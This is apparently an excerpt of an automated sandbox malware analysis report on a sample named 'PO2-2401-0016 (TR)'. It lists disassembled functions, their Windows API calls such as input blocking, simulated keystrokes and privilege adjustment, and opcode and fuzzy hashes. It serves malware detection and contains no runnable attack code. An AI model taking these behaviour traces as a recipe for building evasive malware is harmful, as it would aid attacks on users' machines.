                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: InputSendkeybd_event
                                • String ID:
                                • API String ID: 3536248340-0
                                • Opcode ID: 16937ffffb7f8227e6ae5d8b96f983665ccdfd3369cf2b1fe3b19ca9929b5d94
                                • Instruction ID: 181517e38a4b2ff027b0b3c224695ee2eec24733d1d80b23ac04a90051dec9d6
                                • Opcode Fuzzy Hash: 16937ffffb7f8227e6ae5d8b96f983665ccdfd3369cf2b1fe3b19ca9929b5d94
                                • Instruction Fuzzy Hash: 6CF01D7190428EABDB059FA1C845BEE7BB4FF04305F008049F965A9191C379D6519F94
                                Function 001B10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001B11FC), ref: 001B10D4
                                • CloseHandle.KERNEL32(?,?,001B11FC), ref: 001B10E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AdjustCloseHandlePrivilegesToken
                                • String ID:
                                • API String ID: 81990902-0
                                • Opcode ID: 0f05c0d7edc46ddefa2b4b115e2539b28a7e91323d9c116bcc2fbed42d038ef3
                                • Instruction ID: 226fd330bbba92d0709267fe84b32f6bfd97537d7d80a80ee7159cb8d4d119a5
                                • Opcode Fuzzy Hash: 0f05c0d7edc46ddefa2b4b115e2539b28a7e91323d9c116bcc2fbed42d038ef3
                                • Instruction Fuzzy Hash: 67E04F32004600AEE7252B51FC05EB77BA9FB04310B10882EF4A5844B1DB626CE1DB50
                                Function 0018676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00186766,?,?,00000008,?,?,0018FEFE,00000000), ref: 00186998
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 7efdca6b6de1e8e9f838ceb9e88d152baab41f40cf381180628403ae2db99702
                                • Instruction ID: 9bfe75c222f64e5ec982550b100e19866e543599ca4d78efbf4873f1714a709b
                                • Opcode Fuzzy Hash: 7efdca6b6de1e8e9f838ceb9e88d152baab41f40cf381180628403ae2db99702
                                • Instruction Fuzzy Hash: 7EB13B31610609DFD719DF28C48AB657BE0FF45368F258658E89ACF2A2C735EA91CF40
                                Function 0016B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 82aa001afdb5d6f65a5e020ab521dfae21cd02f4d58943eac68545285ed04267
                                • Instruction ID: 313af184affb30cb9f5ea653d44c337edcd3bb2866dcfb1bbdad865218d7e918
                                • Opcode Fuzzy Hash: 82aa001afdb5d6f65a5e020ab521dfae21cd02f4d58943eac68545285ed04267
                                • Instruction Fuzzy Hash: E0124075D042299BDB24CF58C8807EEB7F5FF48710F1581AAE849EB255EB309E91CB90
                                Function 001CEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • BlockInput.USER32(00000001), ref: 001CEABD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: bcf00c57f613047c4544b588b4e39f11e078695fea6f1e51366c5ae0b102192a
                                • Instruction ID: 024d7c106a67a6646738c74a8a72d81279c34f3de4f4968b0fd84092d86be4b0
                                • Opcode Fuzzy Hash: bcf00c57f613047c4544b588b4e39f11e078695fea6f1e51366c5ae0b102192a
                                • Instruction Fuzzy Hash: 69E04F312102049FC710EF69D844E9AF7E9AFA8760F00841AFC49CB751DBB0E8458B90
                                Function 001709D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001703EE), ref: 001709DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 802fb7797659b3b728709d5b70caf001c6ae58f0c7cc04cbf027d018100d0a5c
                                • Instruction ID: 154f79b0d7f5f09755330166283a257bd882121cb5ff6d08619dcd53b9fca18e
                                • Opcode Fuzzy Hash: 802fb7797659b3b728709d5b70caf001c6ae58f0c7cc04cbf027d018100d0a5c
                                • Instruction Fuzzy Hash:
                                Function 0017781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                • Instruction ID: 51a7e498feb8b096793290e993707060369b2d86b0323a33945bddb6f5a2ed3a
                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                • Instruction Fuzzy Hash: CF51887164C705ABDF388568C85EBBE63B99B12358F18C919E98EC72C2C711DE41D393
                                Function 001C2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: 0&"
                                • API String ID: 0-3449093698
                                • Opcode ID: 2627cc5f48510c8a37ac77796b6f6e8dfead87f0c9f1fb73ecefabd65589e713
                                • Instruction ID: cd654b31cc05e0e0be617e21116041658166cab8eb6d2b65d112cb4e55a30b73
                                • Opcode Fuzzy Hash: 2627cc5f48510c8a37ac77796b6f6e8dfead87f0c9f1fb73ecefabd65589e713
                                • Instruction Fuzzy Hash: 4821B7326206119BD728CF79D92367E73E9A764310F15862EE4A7C77D1DE3AE904CB80
                                Function 00186DD9 Relevance: .6, Instructions: 637COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77d7abe44138616d7bd2ef4e51195efccc77e87f9baa4961c8739b9fa3a81edc
                                • Instruction ID: 34283e9119d23779ff2c4252e097093873a9d9afd2a2f44c0ba8dc2d5cb560f4
                                • Opcode Fuzzy Hash: 77d7abe44138616d7bd2ef4e51195efccc77e87f9baa4961c8739b9fa3a81edc
                                • Instruction Fuzzy Hash: 4532F321D29F014DD723A634D822335A649AFB73C5F25D737E81AB5DAAEB39C5C38600
                                Function 0016CC39 Relevance: .6, Instructions: 635COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f49192fc4c1b10feb3632740c1fd46f237f3380d41a39de5cbd48247e7256cd
                                • Instruction ID: b2c1d17542a7bec7d5957da00b4372dac64ca418dcf669dc1f19bd9aa3f1f886
                                • Opcode Fuzzy Hash: 6f49192fc4c1b10feb3632740c1fd46f237f3380d41a39de5cbd48247e7256cd
                                • Instruction Fuzzy Hash: 5E32373AA041158BCF28CF6CC8946BD7BA1EF46314F29856AD49ADB391E730DD81DBD0
                                Function 00157920 Relevance: .6, Instructions: 563COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c85812601e5ff052a5dbf8b220c39fd7cc63c2873879d0421ccb7fc99409b66a
                                • Instruction ID: 9ee16eb595346af47c890bd2842d56c3da12b36eb881c4dd2ae70674a3140bae
                                • Opcode Fuzzy Hash: c85812601e5ff052a5dbf8b220c39fd7cc63c2873879d0421ccb7fc99409b66a
                                • Instruction Fuzzy Hash: CF22C2B0A04609DFDF14CF64D882AAEB7F6FF54301F144529E826EB291EB36AD15CB50
                                Function 001591C0 Relevance: .5, Instructions: 475COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5dc1ab9305b4bb67064b6f080fcf67c09e987f177991ab48d0212383e757bd4b
                                • Instruction ID: ce52f3b31a2a47d720de1609251c19317ece2e914cea1ee3e4952525fa969d8d
                                • Opcode Fuzzy Hash: 5dc1ab9305b4bb67064b6f080fcf67c09e987f177991ab48d0212383e757bd4b
                                • Instruction Fuzzy Hash: C402B6B1E00209EBDF04DF64D881AADBBF5FF54300F118169E816DB291EB31EA65CB95
                                Function 00171C77 Relevance: .3, Instructions: 254COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                • Instruction ID: b353f8d3a72e557f59149b42d8492c632099f8f23664a6b0ca0e3bffe41ce1c6
                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                • Instruction Fuzzy Hash: C59188731080A35ADB2E467E857907EFFF15A923A131A479DD4FACA1C1FF20C954DA20
                                Function 001719B0 Relevance: .2, Instructions: 240COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                • Instruction ID: 815156f3c3dd5adc3df66e13d35b1b868088af752db7552e44a448c99f7c8796
                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                • Instruction Fuzzy Hash: B99130722090E25ADB2D467E857403DFEF15A923A131A879DD4FACB1C1FF248659D620
                                Function 00177A4A Relevance: .2, Instructions: 237COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0462ae075220569421503736d0015834fdb0a28793959f49ad4d55881531e2fe
                                • Instruction ID: 7104e99ce7bf15d4157ad1316843741d0bbf4cc2354614b711f26d50d2626b90
                                • Opcode Fuzzy Hash: 0462ae075220569421503736d0015834fdb0a28793959f49ad4d55881531e2fe
                                • Instruction Fuzzy Hash: 48616831748709A6EE38AA288C95BBE23B4DF55700F18C91AE94EDB2C1DB119F42C755
                                Function 00171706 Relevance: .2, Instructions: 232COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                • Instruction ID: f633d32736c9c6c9d2fbf2fc55baca527b92d4ba7fe3de46f20a2499283c0b80
                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                • Instruction Fuzzy Hash: 7D8184336080A319DB6D463E853407EFFF15A923A531A879DD4FACB1C1EF24C659E620
                                Function 036E0A60 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction ID: ffe3cd98e9db5fe8b654b55c60ace177327ab8d7675936fe6e63b52f5742e164
                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction Fuzzy Hash: E441A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                Function 036E0950 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction ID: 395138cc11a6358c9de9540bd5669d4ed6b2c8d8c213cb472573665698c54d23
                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction Fuzzy Hash: BA019279A01209EFCB44DF99C6909AEF7F5FB88310F248599E819A7341D770AE41DB80
                                Function 036E08F0 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction ID: cc30c989bb0469c60cc2a96047832f38ba23b6601e0db4d855f0b79cb5c1781f
                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction Fuzzy Hash: 08019278A01209EFCB44DF99C6909AEF7B5FB48310F208599D819A7301D770AE42DF80
                                Function 036DF2D0 Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                Function 001D2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 001D2B30
                                • DeleteObject.GDI32(00000000), ref: 001D2B43
                                • DestroyWindow.USER32 ref: 001D2B52
                                • GetDesktopWindow.USER32 ref: 001D2B6D
                                • GetWindowRect.USER32(00000000), ref: 001D2B74
                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001D2CA3
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001D2CB1
                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2CF8
                                • GetClientRect.USER32(00000000,?), ref: 001D2D04
                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001D2D40
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D62
                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D75
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D80
                                • GlobalLock.KERNEL32(00000000), ref: 001D2D89
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D98
                                • GlobalUnlock.KERNEL32(00000000), ref: 001D2DA1
                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2DA8
                                • GlobalFree.KERNEL32(00000000), ref: 001D2DB3
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2DC5
                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,001EFC38,00000000), ref: 001D2DDB
                                • GlobalFree.KERNEL32(00000000), ref: 001D2DEB
                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001D2E11
                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001D2E30
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2E52
                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D303F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
